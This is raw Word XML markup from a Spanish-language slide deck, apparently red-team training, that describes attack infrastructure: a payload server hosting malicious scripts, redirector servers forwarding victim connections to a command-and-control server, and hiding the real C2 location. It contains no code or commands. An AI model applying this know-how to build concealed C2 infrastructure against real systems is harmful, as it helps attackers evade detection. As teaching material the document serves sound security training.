        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8CBE6C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7219C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F05903C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="449DEA2E" w14:textId="7D780A5D" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="118" w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1134" w:right="3029" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload-Server : </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Este es un servidor dedicado que aloja todos los scripts maliciosos, ejecutables, etc. y es accesible tanto desde la red del atacante </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>víctima</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792DCFAF" w14:textId="7BB4ACCA" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485325824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48FCC695" wp14:editId="5E7F3CB2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2301766</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83711</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7524750" cy="4524703"/>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5" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7526876" cy="4525981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8558C5" w14:textId="50C3D981" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FAB627F" w14:textId="4E67B5C2" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEE6F63" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42340D38" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61EBF888" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AA556B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059BC5D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44006B2B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1C29B6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567903D5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B94DE9D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192D1DE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E0097E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D90EED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157FD04C" w14:textId="0A63BE1D" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007A7B84" w:rsidP="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8417"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366B5D8"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22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B0F2F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId26"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="580" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42936720" w14:textId="08776B4A" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E" w:rsidP="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1463"/>
        </w:tabs>
        <w:spacing w:before="60" w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1464" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Servidor de redireccionamiento : </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Un redireccionamiento es un sistema que redirige todo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>tráfico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servidor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>comando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> y control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE80D18" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004B1CBA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="397"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C99B83A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1463"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1463" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los actores de amenazas no utilizan un sistema para lanzar ataques y obtener shells. Configuran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D6CCE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1464"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>varios sistemas para que actúen como puntos de pivote (redirectores) de vuelta a su servidor C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83D3A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5ABB8E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="453"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D9F7EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1464"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1464" w:right="1407" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Estos evitan que el cliente pueda ver nuestro C2 real, y deben ser fáciles de girar y desmontar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23090190" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId27"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1120" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:pgNumType w:start="23"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8DA949" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1449"/>
        </w:tabs>
        <w:spacing w:before="67" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1449" w:right="1268" w:hanging="540"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Se encuentra entre el entorno de la víctima y la red del atacante, escucha la conexión de la máquina objetivo y la reenvía al atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A4234B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57EAE2EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="70"/>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7599616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54B49D21" wp14:editId="2FFCDE1F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3118115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>215247</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5937885" cy="4269105"/>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4269105"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5937885" cy="4269105"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="71" name="Image 71"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5937471" cy="4268566"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="72" name="Image 72"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId29" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2899906" y="854614"/>
                            <a:ext cx="155955" cy="194055"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="73" name="Image 73"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId29" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2738362" y="2788569"/>
                            <a:ext cx="155956" cy="194056"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4E50885F" id="Group 70" o:spid="_x0000_s1026" style="position:absolute;margin-left:245.5pt;margin-top:16.95pt;width:467.55pt;height:336.15pt;z-index:-15716864;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="59378,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">
                <v:shape id="Image 71" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:59374;height:4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">
                  <v:imagedata r:id="rId30" o:title=""/>
                </v:shape>
                <v:shape id="Image 72" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:28999;top:8546;width:1559;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">
                  <v:imagedata r:id="rId31" o:title=""/>
                </v:shape>
                <v:shape id="Image 73" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:27383;top:27885;width:1560;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">
                  <v:imagedata r:id="rId31" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="69100FC9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="169"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283A77A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1449"/>
        </w:tabs>
        <w:ind w:left="1449" w:hanging="540"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Protege la ubicación original del servidor de equipo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BF44A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
